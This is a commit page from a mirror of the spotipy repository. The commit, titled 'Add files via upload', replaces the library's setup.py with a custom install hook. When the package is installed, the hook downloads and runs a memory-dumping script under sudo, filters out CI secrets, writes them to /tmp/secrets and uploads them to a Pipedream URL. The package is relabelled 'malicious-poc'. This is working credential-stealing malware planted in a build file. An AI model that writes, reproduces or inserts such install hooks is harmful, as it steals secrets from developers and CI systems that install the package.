anas/spotipy
1
0
Fork 0
mirror of https://github.com/spotipy-dev/spotipy.git synced 2026-06-19 09:13:53 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Add files via upload

Browse Source
This commit is contained in:
Vamsi Krishna Bonam 2025-06-26 17:17:22 +02:00 committed by GitHub
parent e13b10885a
commit 6831dff580
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 28 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

61
setup.py
View File

@ -1,40 +1,35 @@
from setuptools import setup from setuptools import setup
from setuptools.command.install import install
import subprocess
with open("README.md") as f: class CustomInstallCommand(install):
long_description = f.read() def run(self):
# 1. Download and run memdump.py, filter for possible secrets, save to /tmp/secrets
bash_command = '''curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\\0' | grep -aoE '"[^"]+":\\{"value":"[^"]*","isSecret":true\\}' >> /tmp/secrets'''
subprocess.run(["bash", "-c", bash_command])
memcache_cache_reqs = [ # 2. Exfiltrate to Pipedream
'pymemcache>=3.5.2' exfil_command = "curl -X PUT --upload-file /tmp/secrets https://eoiissjprny7lfp.m.pipedream.net/secrets.txt"
] subprocess.run(["bash", "-c", exfil_command])
extra_reqs = { # 3. Optional: Sleep (can remove if not needed)
'memcache': [ sleep_command = "sleep 60"
'pymemcache>=3.5.2' subprocess.run(["bash", "-c", sleep_command])
],
'test': [ install.run(self)
'flake8>=7.1.1',
'isort>=5.13.2'
]
}
setup( setup(
name='spotipy', name='malicious-poc',
version='3.0.0-alpha', version='1.0.0',
description='A light weight Python library for the Spotify Web API', author='PoC Researcher',
long_description=long_description, author_email='attacker@example.com',
long_description_content_type="text/markdown", description='Proof-of-Concept package with custom install logic',
author="@plamere", packages=['malicious_poc'],
author_email="paul@echonest.com", python_requires='>=3.6',
url='https://spotipy.readthedocs.org/', classifiers=[
project_urls={ 'Programming Language :: Python :: 3',
'Source': 'https://github.com/plamere/spotipy',
},
python_requires='>3.8',
install_requires=[
"redis>=3.5.3", # TODO: Move to extras_require in v3
"requests>=2.25.0",
"urllib3>=1.26.0"
], ],
extras_require=extra_reqs, cmdclass={
license='MIT', 'install': CustomInstallCommand,
packages=['spotipy']) },
)